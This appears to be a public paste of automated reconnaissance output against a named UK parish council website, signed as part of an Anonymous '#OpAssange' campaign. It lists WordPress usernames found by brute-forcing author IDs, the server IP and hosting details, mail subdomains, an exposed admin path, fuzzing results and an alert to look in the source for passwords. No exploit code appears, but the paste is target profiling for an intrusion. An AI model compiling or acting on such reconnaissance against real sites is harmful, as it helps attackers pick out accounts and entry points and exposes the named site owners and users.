- | - https://www.mundesley-pc.gov.uk/wp-content/themes/mundesleypc2017/style.css, Match: 'Version: 1.0'
- [+] Enumerating Users (via Passive and Aggressive Methods)
- Brute Forcing Author IDs - Time: 00:00:05 <============> (10 / 10) 100.00% Time: 00:00:05
- [i] User(s) Identified:
- [+] Doreen
- | Detected By: Rss Generator (Aggressive Detection)
- [+] joshbizadmin
- | Detected By: Yoast Seo Author Sitemap (Aggressive Detection)
- | - https://www.mundesley-pc.gov.uk/author-sitemap.xml
- [+] doreen
- | Detected By: Yoast Seo Author Sitemap (Aggressive Detection)
- | - https://www.mundesley-pc.gov.uk/author-sitemap.xml
- [+] Finished: Thu Sep 5 02:10:19 2019
- [+] Requests Done: 94
- [+] Cached Requests: 10
- [+] Data Sent: 24.702 KB
- [+] Data Received: 1.445 MB
- [+] Memory used: 103.266 MB
- [+] Elapsed time: 00:01:34
- #######################################################################################################################################
- [INFO] ------TARGET info------
- [*] TARGET: https://www.mundesley-pc.gov.uk/
- [*] TARGET IP: 89.145.78.0
- [INFO] NO load balancer detected for www.mundesley-pc.gov.uk...
- [*] DNS servers: ns1.livedns.co.uk.
- [*] TARGET server: Apache
- [*] CC: GB
- [*] Country: United Kingdom
- [*] RegionCode: ENG
- [*] RegionName: England
- [*] City: Hemel Hempstead
- [*] ASN: AS29017
- [*] BGP_PREFIX: 89.145.64.0/18
- [*] ISP: GYRON Gyron Internet Ltd, GB
- [INFO] SSL/HTTPS certificate detected
- [*] Issuer: issuer=C = US, O = Let's Encrypt, CN = Let's Encrypt Authority X3
- [*] Subject: subject=CN = mundesley-pc.gov.uk
- [ALERT] Let's Encrypt is commonly used for Phishing
- [INFO] DNS enumeration:
- [*] mail.mundesley-pc.gov.uk 213.171.216.40
- [*] webmail.mundesley-pc.gov.uk 213.171.216.231
- [INFO] Possible abuse mails are:
- [INFO] NO PAC (Proxy Auto Configuration) file FOUND
- [ALERT] robots.txt file FOUND in http://www.mundesley-pc.gov.uk/robots.txt
- [INFO] Checking for HTTP status codes recursively from http://www.mundesley-pc.gov.uk/robots.txt
- [INFO] Status code Folders
- [*] 200 http://www.mundesley-pc.gov.uk/wp-admin/
- [INFO] Starting FUZZing in http://www.mundesley-pc.gov.uk/FUzZzZzZzZz...
- [INFO] Status code Folders
- [*] 200 http://www.mundesley-pc.gov.uk/news
- [ALERT] Look in the source code. It may contain passwords
- [INFO] Links found from https://www.mundesley-pc.gov.uk/ http://89.145.78.0/:
- [INFO] GOOGLE has 18,500 results (0.24 seconds) about http://www.mundesley-pc.gov.uk/
- [INFO] BING shows 89.145.78.0 is shared with 31,300 hosts/vhosts
- [INFO] Shodan detected the following opened ports on 89.145.78.0:
- [INFO] ------VirusTotal SECTION------
- [INFO] VirusTotal passive DNS only stores address records. The following domains resolved to the given IP address:
- [INFO] Latest URLs hosted in this IP address detected by at least one URL scanner or malicious URL dataset:
- [INFO] Latest files that are not detected by any antivirus solution and were downloaded by VirusTotal from the IP address provided:
- [INFO] ------Alexa Rank SECTION------
- [INFO] Percent of Visitors Rank in Country:
- [INFO] Percent of Search Traffic:
- [INFO] Percent of Unique Visits:
- [INFO] Total Sites Linking In:
- [INFO] Useful links related to www.mundesley-pc.gov.uk - 89.145.78.0:
- [*] https://www.virustotal.com/pt/ip-address/89.145.78.0/information/
- [*] https://www.hybrid-analysis.com/search?host=89.145.78.0
- [*] https://www.shodan.io/host/89.145.78.0
- [*] https://www.senderbase.org/lookup/?search_string=89.145.78.0
- [*] https://www.alienvault.com/open-threat-exchange/ip/89.145.78.0
- [*] http://pastebin.com/search?q=89.145.78.0
- [*] http://urlquery.net/search.php?q=89.145.78.0
- [*] http://www.alexa.com/siteinfo/www.mundesley-pc.gov.uk
- [*] http://www.google.com/safebrowsing/diagnostic?site=www.mundesley-pc.gov.uk
- [*] https://censys.io/ipv4/89.145.78.0
- [*] https://www.abuseipdb.com/check/89.145.78.0
- [*] https://urlscan.io/search/#89.145.78.0
- [*] https://github.com/search?q=89.145.78.0&type=Code
- [INFO] Useful links related to AS29017 - 89.145.64.0/18:
- [*] http://www.google.com/safebrowsing/diagnostic?site=AS:29017
- [*] https://www.senderbase.org/lookup/?search_string=89.145.64.0/18
- [*] http://bgp.he.net/AS29017
- [*] https://stat.ripe.net/AS29017
- [INFO] Date: 05/09/19 | Time: 02:11:22
- [INFO] Total time: 2 minute(s) and 18 second(s)
- #######################################################################################################################################
- Anonymous JTSEC #OpAssange Full Recon #27
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement